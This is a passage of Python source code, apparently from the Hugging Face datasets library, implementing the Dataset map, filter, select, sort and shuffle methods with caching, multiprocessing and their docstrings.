each) If no function is provided, default to identity function: ``lambda x: x``. with_indices (:obj:`bool`, default `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx[, rank]): ...`. with_rank (:obj:`bool`, default `False`): Provide process rank to `function`. Note that in this case the signature of `function` should be `def function(example[, idx], rank): ...`. input_columns (`Optional[Union[str, List[str]]]`, default `None`): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, default `False`): Provide batch of examples to `function`. batch_size (`Optional[int]`, default `1000`): Number of examples per batch provided to `function` if `batched=True` `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`. drop_last_batch (:obj:`bool`, default `False`): Whether a last batch smaller than the batch_size should be dropped instead of being processed by the function. remove_columns (`Optional[Union[str, List[str]]]`, default `None`): Remove a selection of columns while doing the mapping. Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding columns with names in `remove_columns`, these columns will be kept. keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, default `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, default `False`): Disallow null values in the table. fn_kwargs (`Optional[Dict]`, default `None`): Keyword arguments to be passed to `function`. num_proc (`Optional[int]`, default `None`): Max number of processes when generating cache. Already cached shards are loaded sequentially suffix_template (:obj:`str`): If cache_file_name is specified, then this suffix will be added at the end of the base name of each: defaults to "_{rank:05d}_of_{num_proc:05d}". For example, if cache_file_name is "processed.arrow", then for rank=1 and num_proc=4, the resulting file would be "processed_00001_of_00004.arrow" for the default suffix. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while mapping examples. """ if keep_in_memory and cache_file_name is not None: raise ValueError("Please use either `keep_in_memory` or `cache_file_name` but not both.") if num_proc is not None and num_proc <= 0: raise ValueError("num_proc must be an integer > 0.") # If the array is empty we do nothing if len(self) == 0: return self if function is None: function = lambda x: x # noqa: E731 def decorate(f): """ Decorate the mapped function, so that its first argument is wrapped with a LazyDict to be used internally but a standard dictionary is returned at the end of the mapping. """ @wraps(f) def decorated(item, *args, **kwargs): # Decorate first arg with LazyDict (either Example or Batch) decorated_item = ( Example(item, features=self.features) if not batched else Batch(item, features=self.features) ) # Use the LazyDict internally, while mapping the function result = f(decorated_item, *args, **kwargs) # Return a standard dict return result.data if isinstance(result, LazyDict) else result return decorated function = decorate(function) if not self._format_type and not input_columns else function if isinstance(input_columns, str): input_columns = [input_columns] if input_columns is not None: for input_column in input_columns: if input_column not in self._data.column_names: raise ValueError( f"Input column {input_column} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) if isinstance(remove_columns, str): remove_columns = [remove_columns] if remove_columns is not None and any(col not in self._data.column_names for col in remove_columns): raise ValueError( f"Column to remove {list(filter(lambda col: col not in self._data.column_names, remove_columns))} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) load_from_cache_file = load_from_cache_file if load_from_cache_file is not None else is_caching_enabled() if fn_kwargs is None: fn_kwargs = {} if num_proc is not None and num_proc > len(self): num_proc = len(self) logger.warning( f"num_proc must be <= {len(self)}. Reducing num_proc to {num_proc} for dataset of size {len(self)}." ) disable_tqdm = bool(logging.get_verbosity() == logging.NOTSET) or not utils.is_progress_bar_enabled() if num_proc is None or num_proc == 1: return self._map_single( function=function, with_indices=with_indices, with_rank=with_rank, input_columns=input_columns, batched=batched, batch_size=batch_size, drop_last_batch=drop_last_batch, remove_columns=remove_columns, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, features=features, disable_nullable=disable_nullable, fn_kwargs=fn_kwargs, new_fingerprint=new_fingerprint, disable_tqdm=disable_tqdm, desc=desc, ) else: def format_cache_file_name(cache_file_name, rank): sep = cache_file_name.rindex(".") base_name, extension = cache_file_name[:sep], cache_file_name[sep:] cache_file_name = base_name + suffix_template.format(rank=rank, num_proc=num_proc) + extension logger.info(f"Process #{rank} will write at {cache_file_name}") return cache_file_name def format_new_fingerprint(new_fingerprint, rank): return new_fingerprint + suffix_template.format(rank=rank, num_proc=num_proc) prev_env = deepcopy(os.environ) # check if parallelism if off # from https://github.com/huggingface/tokenizers/blob/bb668bc439dc34389b71dbb8ce0c597f15707b53/tokenizers/src/utils/parallelism.rs#L22 if prev_env.get("TOKENIZERS_PARALLELISM", "false").lower() not in ( "", "off", "false", "f", "no", "n", "0", ): logger.warning("Setting TOKENIZERS_PARALLELISM=false for forked processes.") os.environ["TOKENIZERS_PARALLELISM"] = "false" initargs, initializer = None, None if not disable_tqdm: initargs, initializer = (RLock(),), tqdm.set_lock shards = [ self.shard(num_shards=num_proc, index=rank, contiguous=True, keep_in_memory=keep_in_memory) for rank in range(num_proc) ] kwds_per_shard = [ dict( self=shards[rank], function=function, with_indices=with_indices, with_rank=with_rank, input_columns=input_columns, batched=batched, batch_size=batch_size, drop_last_batch=drop_last_batch, remove_columns=remove_columns, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=format_cache_file_name(cache_file_name, rank) if cache_file_name is not None else None, writer_batch_size=writer_batch_size, features=features.copy() if features is not None else None, disable_nullable=disable_nullable, fn_kwargs=fn_kwargs, rank=rank, offset=sum(len(s) for s in shards[:rank]), disable_tqdm=disable_tqdm, new_fingerprint=format_new_fingerprint(new_fingerprint, rank) if new_fingerprint is not None else None, desc=desc, ) for rank in range(num_proc) ] # We search for already cached shards def catch_non_existent_error(func, kwargs): try: return func(**kwargs) except NonExistentDatasetError: return None transformed_shards = [ catch_non_existent_error(self.__class__._map_single, dict(cache_only=True, **kwds)) for kwds in kwds_per_shard ] # We try to create a pool with as many workers as dataset not yet cached. nb_of_missing_shards = transformed_shards.count(None) if nb_of_missing_shards > 0: with Pool(nb_of_missing_shards, initargs=initargs, initializer=initializer) as pool: os.environ = prev_env logger.info(f"Spawning {num_proc} processes") results = { i: pool.apply_async(self.__class__._map_single, kwds=kwds) for i, (kwds, cached_shard) in enumerate(zip(kwds_per_shard, transformed_shards)) if cached_shard is None } assert ( len(results) == nb_of_missing_shards ), "The number of missing cached shards needs to correspond to the number of `_map_single` we're running" for index, async_result in results.items(): transformed_shards[index] = async_result.get() assert ( transformed_shards.count(None) == 0 ), "All shards have to be defined Datasets, none should still be missing." logger.info(f"Concatenating {num_proc} shards") result = concatenate_datasets(transformed_shards) if new_fingerprint is not None: result._fingerprint = new_fingerprint return result @transmit_tasks @transmit_format @fingerprint_transform( inplace=False, ignore_kwargs=["load_from_cache_file", "cache_file_name", "disable_tqdm", "desc", "cache_only"] ) def _map_single( self, function: Optional[Callable] = None, with_indices: bool = False, with_rank: bool = False, input_columns: Optional[List[str]] = None, batched: bool = False, batch_size: Optional[int] = 1000, drop_last_batch: bool = False, remove_columns: Optional[List[str]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = None, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, fn_kwargs: Optional[dict] = None, new_fingerprint: Optional[str] = None, rank: Optional[int] = None, offset: int = 0, disable_tqdm: bool = False, desc: Optional[str] = None, cache_only: bool = False, ) -> "Dataset": """Apply a function to all the elements in the table (individually or in batches) and update the table (if function does update examples). Args: function (:obj:`Callable`): with one of the following signature: - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False` and `with_rank=False` - `function(example: Union[Dict, Any], *extra_args) -> Union[Dict, Any]` if `batched=False` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False` and `with_rank=False` - `function(batch: Union[Dict[List], List[Any]], *extra_args) -> Union[Dict, Any]` if `batched=True` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) If no function is provided, default to identity function: lambda x: x with_indices (:obj:`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx[, rank]): ...`. with_rank (:obj:`bool`, default `False`): Provide process rank to `function`. Note that in this case the signature of `function` should be `def function(example[, idx], rank): ...`. input_columns (`Optional[List[str]]`, defaults to `None`): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, defaults to `False`): Provide batch of examples to `function` batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True` `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function` drop_last_batch (:obj:`bool`, default: `False`): Whether a last batch smaller than the batch_size should be dropped instead of being processed by the function. remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping. Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding columns with names in `remove_columns`, these columns will be kept. keep_in_memory (:obj:`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, defaults to `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, defaults to `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, defaults to `False`): Disallow null values in the table. fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function` new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments rank: (`Optional[int]`, defaults to `None`): If specified, this is the process rank when doing multiprocessing offset: (:obj:`int`, defaults to 0): If specified, this is an offset applied to the indices passed to `function` if `with_indices=True`. disable_tqdm (:obj:`bool`, defaults to `False`): Whether to silence tqdm's output. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while mapping examples. cache_only (`bool`, defaults to `False`): Flag in order to notifiy the method will either find a cached dataset or raise `NonExistentDatasetError` exception, """ # Reduce logging to keep things readable in multiprocessing with tqdm if rank is not None and logging.get_verbosity() < logging.WARNING: logging.set_verbosity_warning() # Print at least one thing to fix tqdm in notebooks in multiprocessing # see https://github.com/tqdm/tqdm/issues/485#issuecomment-473338308 if rank is not None and not disable_tqdm and "notebook" in tqdm.__name__: print(" ", end="", flush=True) if fn_kwargs is None: fn_kwargs = {} # If we do batch computation but no batch size is provided, default to the full dataset if batched and (batch_size is None or batch_size <= 0): batch_size = self.num_rows # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if cache_file_name is None: # we create a unique hash from the function, # current dataset file and the mapping args cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached processed dataset at {cache_file_name}") info = self.info.copy() info.features = features info.task_templates = None return Dataset.from_file(cache_file_name, info=info, split=self.split) # Raise an error if we were supposed to return a cached dataset and none was found if cache_only: raise NonExistentDatasetError # We set this variable to True after processing the first example/batch in # `apply_function_on_filtered_inputs` if the map function returns a dict. # If set to False, no new arrow table will be created update_data = None class NumExamplesMismatchError(Exception): pass def validate_function_output(processed_inputs, indices): """Validate output of the map function.""" if processed_inputs is not None and not isinstance(processed_inputs, (Mapping, pa.Table)): raise TypeError( f"Provided `function` which is applied to all elements of table returns a variable of type {type(processed_inputs)}. Make sure provided `function` returns a variable of type `dict` (or a pyarrow table) to update the dataset or `None` if you are only interested in side effects." ) elif isinstance(indices, list) and isinstance(processed_inputs, Mapping): allowed_batch_return_types = (list, np.ndarray) all_dict_values_are_lists = all( isinstance(value, allowed_batch_return_types) for value in processed_inputs.values() ) if all_dict_values_are_lists is False: raise TypeError( f"Provided `function` which is applied to all elements of table returns a `dict` of types {[type(x) for x in processed_inputs.values()]}. When using `batched=True`, make sure provided `function` returns a `dict` of types like `{allowed_batch_return_types}`." ) def apply_function_on_filtered_inputs(inputs, indices, check_same_num_examples=False, offset=0): """Utility to apply the function on a selection of columns.""" nonlocal update_data fn_args = [inputs] if input_columns is None else [inputs[col] for col in input_columns] if offset == 0: effective_indices = indices else: effective_indices = [i + offset for i in indices] if isinstance(indices, list) else indices + offset additional_args = () if with_indices: additional_args += (effective_indices,) if with_rank: additional_args += (rank,) processed_inputs = function(*fn_args, *additional_args, **fn_kwargs) if update_data is None: # Check if the function returns updated examples update_data = isinstance(processed_inputs, (Mapping, pa.Table)) validate_function_output(processed_inputs, indices) if not update_data: return None # Nothing to update, let's move on if self._format_type is not None: inputs = self._getitem( key=(indices if isinstance(indices, int) else slice(indices[0], indices[-1] + 1)), format_type=None, format_columns=None, format_kwargs=None, decoded=False, ) if remove_columns is not None: for column in remove_columns: inputs.pop(column) if check_same_num_examples: input_num_examples = len(inputs[next(iter(inputs.keys()))]) processed_inputs_num_examples = len(processed_inputs[next(iter(processed_inputs.keys()))]) if input_num_examples != processed_inputs_num_examples: raise NumExamplesMismatchError() if isinstance(inputs, dict) and isinstance(processed_inputs, Mapping): inputs.update(processed_inputs) return inputs else: return processed_inputs def init_buffer_and_writer(): # Prepare output buffer and batched writer in memory or on file if we update the table writer_features = features if writer_features is None: writer_features = self.features update_features = True else: update_features = False if keep_in_memory or cache_file_name is None: buf_writer = pa.BufferOutputStream() tmp_file = None writer = ArrowWriter( features=writer_features, stream=buf_writer, writer_batch_size=writer_batch_size, update_features=update_features, fingerprint=new_fingerprint, disable_nullable=disable_nullable, ) else: buf_writer = None logger.info(f"Caching processed dataset at {cache_file_name}") tmp_file = tempfile.NamedTemporaryFile("wb", dir=os.path.dirname(cache_file_name), delete=False) writer = ArrowWriter( features=writer_features, path=tmp_file.name, writer_batch_size=writer_batch_size, update_features=update_features, fingerprint=new_fingerprint, disable_nullable=disable_nullable, ) return buf_writer, writer, tmp_file # If `update_data` is True after processing the first example/batch, initalize these resources with `init_buffer_and_writer` buf_writer, writer, tmp_file = None, None, None # Optionally initialize the writer as a context manager with contextlib.ExitStack() as stack: try: # Only load the columns we actually need if input_columns: input_dataset = self.with_format( self._format_type, columns=input_columns, output_all_columns=False, **self._format_kwargs ) if remove_columns: remove_columns = list(set(remove_columns) & set(input_columns)) else: input_dataset = self # Loop over single examples or batches and write to buffer/file if examples are to be updated pbar_iterable = input_dataset if not batched else range(0, len(input_dataset), batch_size) pbar_unit = "ex" if not batched else "ba" pbar_desc = (desc or "") + " #" + str(rank) if rank is not None else desc pbar = utils.tqdm( pbar_iterable, disable=disable_tqdm, position=rank, unit=pbar_unit, desc=pbar_desc, ) if not batched: for i, example in enumerate(pbar): example = apply_function_on_filtered_inputs(example, i, offset=offset) if update_data: if i == 0: buf_writer, writer, tmp_file = init_buffer_and_writer() stack.enter_context(writer) if isinstance(example, pa.Table): writer.write_row(example) else: writer.write(example) else: for i in pbar: if drop_last_batch and i + batch_size > input_dataset.num_rows: continue batch = input_dataset._getitem( slice(i, i + batch_size), decoded=False, ) indices = list( range(*(slice(i, i + batch_size).indices(input_dataset.num_rows))) ) # Something simpler? try: batch = apply_function_on_filtered_inputs( batch, indices, check_same_num_examples=len(input_dataset.list_indexes()) > 0, offset=offset, ) except NumExamplesMismatchError: raise DatasetTransformationNotAllowedError( "Using `.map` in batched mode on a dataset with attached indexes is allowed only if it doesn't create or remove existing examples. You can first run `.drop_index() to remove your index and then re-add it." ) from None if update_data: if i == 0: buf_writer, writer, tmp_file = init_buffer_and_writer() stack.enter_context(writer) if isinstance(batch, pa.Table): writer.write_table(batch) else: writer.write_batch(batch) if update_data and writer is not None: writer.finalize() # close_stream=bool(buf_writer is None)) # We only close if we are writing in a file except (Exception, KeyboardInterrupt): if update_data: if writer is not None: writer.finalize() if tmp_file is not None: tmp_file.close() if os.path.exists(tmp_file.name): os.remove(tmp_file.name) raise if update_data and tmp_file is not None: tmp_file.close() shutil.move(tmp_file.name, cache_file_name) umask = os.umask(0o666) os.umask(umask) os.chmod(cache_file_name, 0o666 & ~umask) if update_data: # Create new Dataset from buffer or file info = self.info.copy() info.features = writer._features info.task_templates = None if buf_writer is None: return Dataset.from_file(cache_file_name, info=info, split=self.split) else: return Dataset.from_buffer(buf_writer.getvalue(), info=info, split=self.split) else: return self @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["load_from_cache_file", "cache_file_name"], version="2.0.1") def filter( self, function: Optional[Callable] = None, with_indices=False, input_columns: Optional[Union[str, List[str]]] = None, batched: bool = False, batch_size: Optional[int] = 1000, remove_columns: Optional[List[str]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, fn_kwargs: Optional[dict] = None, num_proc: Optional[int] = None, suffix_template: str = "_{rank:05d}_of_{num_proc:05d}", new_fingerprint: Optional[str] = None, desc: Optional[str] = None, ) -> "Dataset": """Apply a filter function to all the elements in the table in batches and update the table so that the dataset only includes examples according to the filter function. Args: function (:obj:`Callable`): Callable with one of the following signatures: - ``function(example: Union[Dict, Any]) -> bool`` if ``with_indices=False, batched=False`` - ``function(example: Union[Dict, Any], indices: int) -> bool`` if ``with_indices=True, batched=False`` - ``function(example: Union[Dict, Any]) -> List[bool]`` if ``with_indices=False, batched=True`` - ``function(example: Union[Dict, Any], indices: int) -> List[bool]`` if ``with_indices=True, batched=True`` If no function is provided, defaults to an always True function: ``lambda x: True``. with_indices (:obj:`bool`, default `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx): ...`. input_columns (:obj:`str` or `List[str]`, optional): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, defaults to `False`): Provide batch of examples to `function` batch_size (:obj:`int`, optional, default `1000`): Number of examples per batch provided to `function` if ``batched = True``. If ``batched = False``, one example per batch is passed to ``function``. If ``batch_size <= 0`` or ``batch_size == None``: provide the full dataset as a single batch to `function` keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. fn_kwargs (:obj:`dict`, optional): Keyword arguments to be passed to `function` num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. suffix_template (:obj:`str`): If `cache_file_name` is specified, then this suffix will be added at the end of the base name of each. For example, if `cache_file_name` is `"processed.arrow"`, then for ``rank = 1`` and ``num_proc = 4``, the resulting file would be `"processed_00001_of_00004.arrow"` for the default suffix (default `_{rank:05d}_of_{num_proc:05d}`) new_fingerprint (:obj:`str`, optional): The new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while filtering examples. """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.filter` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it.`" ) if function is None: function = lambda x: True # noqa: E731 if remove_columns is not None: raise ValueError("Parameter `remove_columns` passed to .filter() is no longer supported.") indices = self.map( function=partial( get_indices_from_mask_function, function, batched, with_indices, input_columns, self._indices ), with_indices=True, features=Features({"indices": Value("uint64")}), batched=True, batch_size=batch_size, remove_columns=self.column_names, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, fn_kwargs=fn_kwargs, num_proc=num_proc, suffix_template=suffix_template, new_fingerprint=new_fingerprint, input_columns=input_columns, desc=desc, ) new_dataset = copy.deepcopy(self) new_dataset._indices = indices.data new_dataset._fingerprint = new_fingerprint return new_dataset @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["cache_file_name"]) def flatten_indices( self, keep_in_memory: bool = False, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create and cache a new Dataset by flattening the indices mapping. Args: keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, default `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, default `False`): Allow null values in the table. new_fingerprint (`Optional[str]`, default `None`): The new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ return self.map( batched=True, # for speed keep_in_memory=keep_in_memory, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, features=features, disable_nullable=disable_nullable, new_fingerprint=new_fingerprint, desc="Flattening the indices", ) def _new_dataset_with_indices( self, indices_cache_file_name: Optional[str] = None, indices_buffer: Optional[pa.Buffer] = None, fingerprint: Optional[str] = None, ) -> "Dataset": """Return a new Dataset obtained by adding indices (provided in indices_cache_file_name or in a buffer) to the current Dataset. """ if indices_cache_file_name is None and indices_buffer is None: raise ValueError("At least one of indices_cache_file_name or indices_buffer must be provided.") if fingerprint is None: raise ValueError("please specify a fingerprint for the dataset with indices") if indices_cache_file_name is not None: indices_table = MemoryMappedTable.from_file(indices_cache_file_name) else: indices_table = InMemoryTable.from_buffer(indices_buffer) # Return new Dataset object # don't forget to copy the objects return Dataset( self._data, info=self.info.copy(), split=self.split, indices_table=indices_table, fingerprint=fingerprint, ) @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["indices_cache_file_name"]) def select( self, indices: Iterable, keep_in_memory: bool = False, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new dataset with rows selected following the list/array of indices. Args: indices (sequence, iterable, ndarray or Series): List or 1D-array of integer indices for indexing. keep_in_memory (:obj:`bool`, default `False`): Keep the indices mapping in memory instead of writing it to a cache file. indices_cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the indices mapping instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if keep_in_memory and indices_cache_file_name is not None: raise ValueError("Please use either `keep_in_memory` or `indices_cache_file_name` but not both.") if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.select` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self # Prepare the writer for our indices arrow table if keep_in_memory or indices_cache_file_name is None: buf_writer = pa.BufferOutputStream() tmp_file = None writer = ArrowWriter( stream=buf_writer, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit="indices" ) else: buf_writer = None logger.info(f"Caching indices mapping at {indices_cache_file_name}") tmp_file = tempfile.NamedTemporaryFile("wb", dir=os.path.dirname(indices_cache_file_name), delete=False) writer = ArrowWriter( path=tmp_file.name, writer_batch_size=writer_batch_size, fingerprint=new_fingerprint, unit="indices" ) indices_array = pa.array(indices, type=pa.uint64()) # Check if we need to convert indices if self._indices is not None: indices_array = self._indices.column(0).take(indices_array) indices_table = pa.Table.from_arrays([indices_array], names=["indices"]) with writer: try: writer.write_table(indices_table) writer.finalize() # close_stream=bool(buf_writer is None)) We only close if we are writing in a file except (Exception, KeyboardInterrupt): if tmp_file is not None: tmp_file.close() if os.path.exists(tmp_file.name): os.remove(tmp_file.name) raise if tmp_file is not None: tmp_file.close() shutil.move(tmp_file.name, indices_cache_file_name) umask = os.umask(0o666) os.umask(umask) os.chmod(indices_cache_file_name, 0o666 & ~umask) # Return new Dataset object if buf_writer is None: return self._new_dataset_with_indices( indices_cache_file_name=indices_cache_file_name, fingerprint=new_fingerprint ) else: return self._new_dataset_with_indices(indices_buffer=buf_writer.getvalue(), fingerprint=new_fingerprint) @transmit_format @fingerprint_transform(inplace=False, ignore_kwargs=["load_from_cache_file", "indices_cache_file_name"]) def sort( self, column: str, reverse: bool = False, kind: str = None, null_placement: str = "last", keep_in_memory: bool = False, load_from_cache_file: bool = True, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new dataset sorted according to a column. Currently sorting according to a column name uses pandas sorting algorithm under the hood. The column should thus be a pandas compatible type (in particular not a nested type). This also means that the column used for sorting is fully loaded in memory (which should be fine in most cases). Args: column (:obj:`str`): column name to sort by. reverse (:obj:`bool`, default `False`): If True, sort by descending order rather then ascending. kind (:obj:`str`, optional): Pandas algorithm for sorting selected in {‘quicksort’, ‘mergesort’, ‘heapsort’, ‘stable’}, The default is ‘quicksort’. Note that both ‘stable’ and ‘mergesort’ use timsort under the covers and, in general, the actual implementation will vary with data type. The ‘mergesort’ option is retained for backwards compatibility. null_placement (:obj:`str`, default `last`): Put `None` values at the beginning if ‘first‘; ‘last‘ puts `None` values at the end. .. versionadded:: 1.14.2 keep_in_memory (:obj:`bool`, default `False`): Keep the sorted indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the sorted indices can be identified, use it instead of recomputing. indices_cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the sorted indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. Higher value gives smaller cache files, lower value consume less temporary memory. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.sort` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self # Check the column name if not isinstance(column, str) or column not in self._data.column_names: raise ValueError( f"Column '{column}' not found in the dataset. Please provide a column selected in: {self._data.column_names}" ) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args indices_cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(indices_cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached sorted indices for dataset at {indices_cache_file_name}") return self._new_dataset_with_indices( fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name ) column_data = self._getitem( column, format_type="pandas", format_columns=None, output_all_columns=False, format_kwargs=None ) df_sorted = column_data.to_frame().sort_values( column, ascending=not reverse, kind=kind, na_position=null_placement ) indices = df_sorted.index.to_numpy() return self.select( indices=indices, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=new_fingerprint, ) @transmit_format @fingerprint_transform( inplace=False, randomized_function=True, ignore_kwargs=["load_from_cache_file", "indices_cache_file_name"] ) def shuffle( self, seed: Optional[int] = None, generator: Optional[np.random.Generator] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, new_fingerprint: Optional[str] = None, ) -> "Dataset": """Create a new Dataset where the rows are shuffled. Currently shuffling uses numpy random generators. You can either supply a NumPy BitGenerator to use, or a seed to initiate NumPy's default random generator (PCG64). Args: seed (:obj:`int`, optional): A seed to initialize the default BitGenerator if ``generator=None``. If None, then fresh, unpredictable entropy will be pulled from the OS. If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state. generator (:obj:`numpy.random.Generator`, optional): Numpy random Generator to use to compute the permutation of the dataset rows. If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy). keep_in_memory (:obj:`bool`, default `False`): Keep the shuffled indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the shuffled indices can be identified, use it instead of recomputing. indices_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the shuffled indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. new_fingerprint (:obj:`str`, optional, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ if 